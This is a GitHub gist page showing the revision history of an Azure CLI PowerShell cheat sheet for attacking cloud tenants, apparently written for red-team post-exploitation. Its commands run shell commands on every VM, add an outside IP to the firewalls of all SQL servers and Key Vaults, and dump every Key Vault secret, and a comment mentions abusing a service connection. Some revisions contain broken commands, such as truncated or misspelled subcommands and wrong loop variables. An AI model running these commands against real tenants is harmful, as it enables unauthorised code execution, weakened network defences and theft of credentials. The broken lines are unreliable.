Skip to content

Instantly share code, notes, and snippets.

@Flangvik

Flangvik/AzureCLICheatSheet.ps1

Last active December 10, 2022 05:02
Show Gist options
  • Save Flangvik/267d9e360f11d7ed2b8f448fbb28914a to your computer and use it in GitHub Desktop.
Save Flangvik/267d9e360f11d7ed2b8f448fbb28914a to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. Flangvik revised this gist Nov 1, 2020. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion AzureCLICheatSheet.ps1
    View file
    Original file line number Diff line number Diff line change
    @@ -5,7 +5,7 @@ az resource list | convertfrom-json | foreach-object { $_ | Select-Object type,
    az vm lis

    #Run PowerShell command on a VM
    az vm run-command invoke --command-id $(New-Guid) --name MyVm --resource-group MyResourceGroup --scripts 'Write-Host FooBar'
    az vm run-command invoke --command-id RunPowerShellScript --name MyVm --resource-group MyResourceGroup --scripts 'whoami'

    #Run PowerShell command on ALL VM's
    az vm list | ConvertFrom-Json | Foreach-object {az vm run-command invoke --command-id RunPowerShellScript --name $_.name --resource-group $_.resourceGroup --scripts 'whoami;hostname' }
  2. Flangvik revised this gist Nov 1, 2020. 1 changed file with 10 additions and 8 deletions.
    18 changes: 10 additions & 8 deletions AzureCLICheatSheet.ps1
    View file
    Original file line number Diff line number Diff line change
    @@ -19,15 +19,17 @@ az sql server firewall-rule create -g mygroup -s myserver -n myrule --start-ip-a
    #Add IP to firewall whitelist for ALL SQL Servers
    az sql server list | ConvertFrom-Json | Foreach-object { az sql server firewall-rule create -g $_.resourceGroup -s $_.name -n $(New-Guid)--start-ip-address XX.XX.XX.XX --end-ip-address XX.XX.XX.XX };

    #Show connection strings for all SQL databases
    foreach ($sqlServer in $( az sql server list | ConvertFrom-Json )){ az sql db show-connection-string --client $_.fullyQualifiedDomainName }


    #Add IP to firewall whitelist for an Azure KeyVault
    az keyvault network-rule add --ip-address XX.XX.XX.XX --name KEYVAULT-NAME

    #Add IP to firewall whitelist for ALL Azure KeyVault
    foreach ($vaultName in $( az keyvault list | ConvertFrom-Json )) {az keyvault network-rule add --ip-address XX.XX.XX.XX --name $vaultName.name };
    #Add IP to firewall whitelist for ALL Azure KeyVault(s)
    foreach ($vaultName in $( az keyvault list | ConvertFrom-Json )) { az keyvault network-rule add --ip-address XX.XX.XX.XX --name $vaultName.name };

    #Dump secrets from ALL Azure KeyVault(s)
    foreach ($vaultName in $( az keyvault list | ConvertFrom-Json )) { foreach ( $secret in $(az keyvault secret list --vault-name $vaultName.name | ConvertFrom-Json)) { $secretValue = $(az keyvault secret show --id $secret.id | ConvertFrom-Json ); write-host $secretValue } };

    #List all users in AAD (You may not have privs for this when abusing an service connection)
    az ad user list

    #Dump everything from all keyvaults
    foreach ($vaultName in $( az keyvault list | ConvertFrom-Json )) { foreach ( $secret in $(az keyvault secret list --vault-name $vaultName.name | ConvertFrom-Json)) { $secretValue = $(az keyvault secret show --id $secret.id | ConvertFrom-Json ); write-host $secretValue } };
    #List groups in AAD (You may not have privs for this when abusing an service connection)
    az ad group list
  3. Flangvik revised this gist Nov 1, 2020. 1 changed file with 9 additions and 6 deletions.
    15 changes: 9 additions & 6 deletions AzureCLICheatSheet.ps1
    View file
    Original file line number Diff line number Diff line change
    @@ -2,22 +2,25 @@
    az resource list | convertfrom-json | foreach-object { $_ | Select-Object type, name, resourceGroup, id}

    #List details for all VM's
    az vm list
    az vm lis

    #Run PowerShell command on a VM
    az vm run-command invoke --command-id $(New-Guid) --name MyVm --resource-group MyResourceGroup --scripts 'Write-Host FooBar'

    #Run PowerShell command on ALL VM's
    az vm list | ConvertFrom-Json | Foreach-object {az vm run-command invoke --command-id RunPowerShellScript --name $_.name --resource-group $_.resourceGroup --scripts 'whoami;hostname' }

    #Show connection strings for all SQL databases
    foreach ($sqlServer in $( az sql server list | ConvertFrom-Json )){ az sql db show-connection-string --client }

    #List details for all SQL Servers
    az sql server list
    #Add IP to firewall whitelist for an SQL Server
    az sql server network-rule add --ip-address XX.XX.XX.XX --name SERVER-NAME
    az sql server firewall-rule create -g mygroup -s myserver -n myrule --start-ip-address XX.XX.XX.XX --end-ip-address XX.XX.XX.XX

    #Add IP to firewall whitelist for ALL SQL Servers
    foreach ($serverInfo in $( az sql server list | ConvertFrom-Json )) { az sql server network-rule addd --ip-address XX.XX.XX.XX --name $serverInfo.name };
    az sql server list | ConvertFrom-Json | Foreach-object { az sql server firewall-rule create -g $_.resourceGroup -s $_.name -n $(New-Guid)--start-ip-address XX.XX.XX.XX --end-ip-address XX.XX.XX.XX };

    #Show connection strings for all SQL databases
    foreach ($sqlServer in $( az sql server list | ConvertFrom-Json )){ az sql db show-connection-string --client $_.fullyQualifiedDomainName }


    #Add IP to firewall whitelist for an Azure KeyVault
  4. Flangvik revised this gist Nov 1, 2020. 1 changed file with 8 additions and 1 deletion.
    9 changes: 8 additions & 1 deletion AzureCLICheatSheet.ps1
    View file
    Original file line number Diff line number Diff line change
    @@ -7,12 +7,19 @@ az vm list
    #Run PowerShell command on a VM
    az vm run-command invoke --command-id $(New-Guid) --name MyVm --resource-group MyResourceGroup --scripts 'Write-Host FooBar'

    #Run PowerShell command on all VM's
    #Run PowerShell command on ALL VM's
    az vm list | ConvertFrom-Json | Foreach-object {az vm run-command invoke --command-id RunPowerShellScript --name $_.name --resource-group $_.resourceGroup --scripts 'whoami;hostname' }

    #Show connection strings for all SQL databases
    foreach ($sqlServer in $( az sql server list | ConvertFrom-Json )){ az sql db show-connection-string --client }

    #Add IP to firewall whitelist for an SQL Server
    az sql server network-rule add --ip-address XX.XX.XX.XX --name SERVER-NAME

    #Add IP to firewall whitelist for ALL SQL Servers
    foreach ($serverInfo in $( az sql server list | ConvertFrom-Json )) { az sql server network-rule addd --ip-address XX.XX.XX.XX --name $serverInfo.name };


    #Add IP to firewall whitelist for an Azure KeyVault
    az keyvault network-rule add --ip-address XX.XX.XX.XX --name KEYVAULT-NAME

  5. Flangvik revised this gist Nov 1, 2020. 1 changed file with 4 additions and 1 deletion.
    5 changes: 4 additions & 1 deletion AzureCLICheatSheet.ps1
    View file
    Original file line number Diff line number Diff line change
    @@ -4,12 +4,15 @@ az resource list | convertfrom-json | foreach-object { $_ | Select-Object type,
    #List details for all VM's
    az vm list

    #Run command on a VM
    #Run PowerShell command on a VM
    az vm run-command invoke --command-id $(New-Guid) --name MyVm --resource-group MyResourceGroup --scripts 'Write-Host FooBar'

    #Run PowerShell command on all VM's
    az vm list | ConvertFrom-Json | Foreach-object {az vm run-command invoke --command-id RunPowerShellScript --name $_.name --resource-group $_.resourceGroup --scripts 'whoami;hostname' }

    #Show connection strings for all SQL databases
    foreach ($sqlServer in $( az sql server list | ConvertFrom-Json )){ az sql db show-connection-string --client }

    #Add IP to firewall whitelist for an Azure KeyVault
    az keyvault network-rule add --ip-address XX.XX.XX.XX --name KEYVAULT-NAME

  6. Flangvik revised this gist Nov 1, 2020. 1 changed file with 1 addition and 2 deletions.
    3 changes: 1 addition & 2 deletions AzureCLICheatSheet.ps1
    View file
    Original file line number Diff line number Diff line change
    @@ -1,7 +1,6 @@
    #Enumerate all resources
    #List all resources
    az resource list | convertfrom-json | foreach-object { $_ | Select-Object type, name, resourceGroup, id}


    #List details for all VM's
    az vm list

  7. Flangvik revised this gist Nov 1, 2020. 1 changed file with 2 additions and 3 deletions.
    5 changes: 2 additions & 3 deletions AzureCLICheatSheet.ps1
    View file
    Original file line number Diff line number Diff line change
    @@ -8,9 +8,8 @@ az vm list
    #Run command on a VM
    az vm run-command invoke --command-id $(New-Guid) --name MyVm --resource-group MyResourceGroup --scripts 'Write-Host FooBar'

    #Run command on all VM's
    az vm list | ConvertFrom-Json | Foreach-object {az vm run-command invoke --command-id RunPowerShellScript --name $_.name --resource-group $_.resourceGroup --scripts 'whoami;hostname' }

    #Run PowerShell command on all VM's
    az vm list | ConvertFrom-Json | Foreach-object {az vm run-command invoke --command-id RunPowerShellScript --name $_.name --resource-group $_.resourceGroup --scripts 'whoami;hostname' }

    #Add IP to firewall whitelist for an Azure KeyVault
    az keyvault network-rule add --ip-address XX.XX.XX.XX --name KEYVAULT-NAME
  8. Flangvik revised this gist Nov 1, 2020. 1 changed file with 4 additions and 2 deletions.
    6 changes: 4 additions & 2 deletions AzureCLICheatSheet.ps1
    View file
    Original file line number Diff line number Diff line change
    @@ -9,12 +9,14 @@ az vm list
    az vm run-command invoke --command-id $(New-Guid) --name MyVm --resource-group MyResourceGroup --scripts 'Write-Host FooBar'

    #Run command on all VM's
    az vm list | ConvertFrom-Json | Foreach-object {az vm run-command invoke --command-id $(New-Guid) --name MyVm --resource-group MyResourceGroup --scripts 'echo $1 $2'
    }
    az vm list | ConvertFrom-Json | Foreach-object {az vm run-command invoke --command-id RunPowerShellScript --name $_.name --resource-group $_.resourceGroup --scripts 'whoami;hostname' }


    #Add IP to firewall whitelist for an Azure KeyVault
    az keyvault network-rule add --ip-address XX.XX.XX.XX --name KEYVAULT-NAME

    #Add IP to firewall whitelist for ALL Azure KeyVault
    foreach ($vaultName in $( az keyvault list | ConvertFrom-Json )) {az keyvault network-rule add --ip-address XX.XX.XX.XX --name $vaultName.name };

    #Dump everything from all keyvaults
    foreach ($vaultName in $( az keyvault list | ConvertFrom-Json )) { foreach ( $secret in $(az keyvault secret list --vault-name $vaultName.name | ConvertFrom-Json)) { $secretValue = $(az keyvault secret show --id $secret.id | ConvertFrom-Json ); write-host $secretValue } };
  9. Flangvik created this gist Nov 1, 2020.
    20 changes: 20 additions & 0 deletions AzureCLICheatSheet.ps1
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,20 @@
    #Enumerate all resources
    az resource list | convertfrom-json | foreach-object { $_ | Select-Object type, name, resourceGroup, id}


    #List details for all VM's
    az vm list

    #Run command on a VM
    az vm run-command invoke --command-id $(New-Guid) --name MyVm --resource-group MyResourceGroup --scripts 'Write-Host FooBar'

    #Run command on all VM's
    az vm list | ConvertFrom-Json | Foreach-object {az vm run-command invoke --command-id $(New-Guid) --name MyVm --resource-group MyResourceGroup --scripts 'echo $1 $2'
    }


    #Add IP to firewall whitelist for an Azure KeyVault
    az keyvault network-rule add --ip-address XX.XX.XX.XX --name KEYVAULT-NAME

    #Dump everything from all keyvaults
    foreach ($vaultName in $( az keyvault list | ConvertFrom-Json )) { foreach ( $secret in $(az keyvault secret list --vault-name $vaultName.name | ConvertFrom-Json)) { $secretValue = $(az keyvault secret show --id $secret.id | ConvertFrom-Json ); write-host $secretValue } };